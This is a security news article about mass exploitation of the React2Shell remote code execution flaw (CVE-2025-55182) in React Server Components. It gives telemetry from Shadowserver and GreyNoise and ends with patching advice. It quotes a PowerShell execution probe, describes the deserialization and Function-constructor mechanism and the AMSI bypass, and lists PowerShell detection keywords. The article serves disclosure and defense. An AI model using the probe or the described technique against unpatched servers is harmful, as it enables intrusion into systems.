Exploitation of CVE-2025-55182, a critical vulnerability in React Server Components (RSC) dubbed React2Shell, has surged dramatically over the weekend.
Telemetry from threat intelligence organizations shows the number of compromised or actively attacking hosts has increased tenfold, targeting over 77,000 vulnerable systems exposed to the internet. While the figure has fallen to 29,000 by Sunday, the attack surface remains huge.
The vulnerability, discovered by independent researcher Lachlan Davidson and reported to Meta on November 29, 2025, resides in unsafe deserialization logic within React's “Flight” protocol. It enables unauthenticated remote code execution (RCE) on affected systems, many of which use default configurations in popular frameworks like Next.js, RedwoodJS, and Vite's RSC plugin. Despite patches being released by December 1 and a coordinated disclosure on December 3, exploitation began almost immediately and has since escalated rapidly.
Evolution of the attacks
While initial attacks were linked to Chinese APTs like Earth Lamia and Jackpot Panda, who focused on reconnaissance and live debugging, the threat landscape evolved swiftly. By December 5, reports from GreyNoise confirmed the beginning of opportunistic mass exploitation. Attackers began using public PoCs and automation to indiscriminately scan and compromise systems, often leveraging infrastructure traditionally associated with botnets.
The Shadowserver Foundation, which operates one of the internet's most extensive honeypot and scanning infrastructures, observed a clear spike in malicious activity beginning December 5. Attack traffic originating from compromised Next.js servers jumped from a baseline of around 100 IPs to nearly 1,000, with payloads targeting Shadowserver's sensors.
In parallel, Shadowserver detected 77,664 publicly exposed IPs vulnerable to the flaw, which have dropped to 28,964 as of December 7.
The rise in volume is also accompanied by a deepening of the attacker toolkit. GreyNoise reports that automated exploitation is leveraging multi-stage payloads. These include proof-of-execution probes using simple arithmetic commands in PowerShell (powershell -c “40320*43488”), followed by base64-encoded downloaders.
These payloads use well-known obfuscation and evasion techniques, such as flipping the AMSI bypass flag to neutralize anti-malware scanning. GreyNoise also observed that a significant share of exploitation IPs were first seen in December 2025, indicative of fresh infrastructure being spun up to feed the campaign.
Another disturbing development is the emergence of a Chrome extension publicly hosted on GitHub that automatically scans for and exploits vulnerable targets as users browse the web, blurring the line between passive scanning and live exploitation.
The affected software stack is deeply embedded across cloud environments. According to prior analysis from Wiz Research, 39% of cloud setups use vulnerable React components, and 69% use Next.js, with many of those exposed due to default configurations. React Server Components, particularly in Next.js 13 and 14's App Router, are commonly front-facing, meaning exploitation often leads directly to system-level access.
Public PoCs require only a single HTTP POST request to exploit default deployments. The attack abuses the $@ deserialization syntax in the Flight protocol to inject arbitrary JavaScript, which is then executed server-side via the Function constructor.
Defending
Given the current scale and automation of the attack campaign, defenders should assume opportunistic targeting is underway across all vulnerable infrastructure. Immediate actions include:
- Upgrade react-server-dom-* to 19.0.1, 19.1.2, or 19.2.1
- Move to Next.js 16.0.7 or the latest patched release
- Use GreyNoise's blocklists to filter automation-heavy traffic.
- Watch for suspicious PowerShell usage, especially commands with -enc, DownloadString, IEX, or AmsiUtils.
- Flag multiple executions of PowerShell arithmetic like XXXXX*YYYYY, often used as lightweight execution checks.
Leave a Reply